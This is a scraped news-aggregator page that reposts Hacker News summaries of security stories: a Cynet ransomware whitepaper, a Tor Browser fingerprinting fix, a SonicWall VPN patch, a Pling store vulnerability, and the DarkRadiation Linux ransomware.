Select Page
[Whitepaper] Automate Your Security with Cynet to Protect from Ransomware

[Whitepaper] Automate Your Security with Cynet to Protect from Ransomware

It seems like every new day brings with it a new ransomware news item – new attacks, methods, horror stories, and data being leaked.

Ransomware attacks are on the rise, and they’ve become a major issue for organizations across industries. A recent report estimated that by 2031, ransomware attacks would cost the world over $260 billion.

A new whitepaper from XDR provider Cynet demonstrates how the company’s platform can help organizations mitigate the impact of ransomware (download here).

Today, attackers have shown themselves to be less interested in ignoring the most vulnerable sectors, such as health care providers and hospitals. With a parallel increase in the number of variants – Wastedlocker, FTCode, Tycooon, TrickBot, REvil, and many others – it’s becoming harder to defend against the growing threat of ransomware.

Ransomware operates by using a variety of infection and encryption techniques to steal or barricade companies’ files behind hard paywalls. Even though many of the most common techniques have become public and organizations can defend against them, new, unknown methods can arrive without notice.

images from Hacker News

Patch Tor Browser Bug to Prevent Tracking of Your Online Activities

Patch Tor Browser Bug to Prevent Tracking of Your Online Activities

Open-source Tor browser has been updated to version 10.0.18 with fixes for multiple issues, including a privacy-defeating bug that could be used to uniquely fingerprint users across different browsers based on the apps installed on a computer.

In addition to updating Tor to 0.4.5.9, the browser’s Android version has been upgraded to Firefox to version 89.1.1, alongside incorporating patches rolled out by Mozilla for several security vulnerabilities addressed in Firefox 89.

Chief among the rectified issues is a new fingerprinting attack that came to light last month. Dubbed scheme flooding, the vulnerability enables a malicious website to leverage information about installed apps on the system to assign users a permanent unique identifier even when they switch browsers, use incognito mode, or a VPN.

Put differently, the weakness takes advantage of custom URL schemes in apps as an attack vector, allowing a bad actor to track a device’s user between different browsers, including Chrome, Firefox, Microsoft Edge, Safari, and even Tor, effectively circumventing cross-browser anonymity protections on Windows, Linux, and macOS.

images from Hacker News

SonicWall Left a VPN Flaw Partially Unpatched Amidst 0-Day Attacks

SonicWall Left a VPN Flaw Partially Unpatched Amidst 0-Day Attacks

A critical vulnerability in SonicWall VPN appliances that was believed to have been patched last year has been now found to be “botched,” with the company leaving a memory leak flaw unaddressed, until now, that could permit a remote attacker to gain access to sensitive information.

The shortcoming was rectified in an update rolled out to SonicOS on June 22.

Tracked as CVE-2021-20019 (CVSS score: 5.3), the vulnerability is the consequence of a memory leak when sending a specially-crafted unauthenticated HTTP request, culminating in information disclosure.

It’s worth noting that SonicWall’s decision to hold back the patch comes amid multiple zero-day disclosures affecting its remote access VPN and email security products that have been exploited in a series of in-the-wild attacks to deploy backdoors and a new strain of ransomware called FIVEHANDS.

However, there is no evidence that the flaw is being exploited in the wild.

images from Hacker News

Unpatched Flaw in Linux Pling Store Apps Could Lead to Supply-Chain Attacks

Unpatched Flaw in Linux Pling Store Apps Could Lead to Supply-Chain Attacks

Cybersecurity researchers have disclosed a critical unpatched vulnerability affecting Pling-based free and open-source software (FOSS) marketplaces for Linux platform that could be potentially abused to stage supply-chain attacks and achieve remote code execution (RCE).

“Linux marketplaces that are based on the Pling platform are vulnerable to a wormable [cross-site scripting] with potential for a supply-chain attack,” Positive Security co-founder Fabian Bräunlein said in a technical write-up published today. “The native PlingStore application is affected by an RCE vulnerability, which can be triggered from any website while the app is running.”

The Pling-based app stores impacted by the flaw include —

  • appimagehub.com
  • store.kde.org
  • gnome-look.org
  • xfce-look.org
  • pling.com

PlingStore allows users to search and install Linux software, themes, icons, and other add-ons that may not be available for download through the distribution’s software centre.

images from Hacker News

Wormable DarkRadiation Ransomware Targets Linux and Docker Instances

Wormable DarkRadiation Ransomware Targets Linux and Docker Instances

Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called “DarkRadiation” that’s implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications.

“The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions,” researchers from Trend Micro said in a report published last week. “The malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram’s API to send an infection status to the threat actor(s).”

As of writing, there’s no information available on the delivery methods or evidence that the ransomware has been deployed in real-world attacks.

The findings come from an analysis of a collection of hacking tools hosted on the unidentified threat actor’s infrastructure (IP address “185.141.25.168”) in a directory called “api_attack.” The toolset was first noticed by Twitter user @r3dbU7z on May 28.

DarkRadiation’s infection chain involves a multi-stage attack process and is noteworthy for its extensive reliance on Bash scripts to retrieve the malware and encrypt the files as well as Telegram API to communicate with the C2 server via hardcoded API keys.

images from Hacker News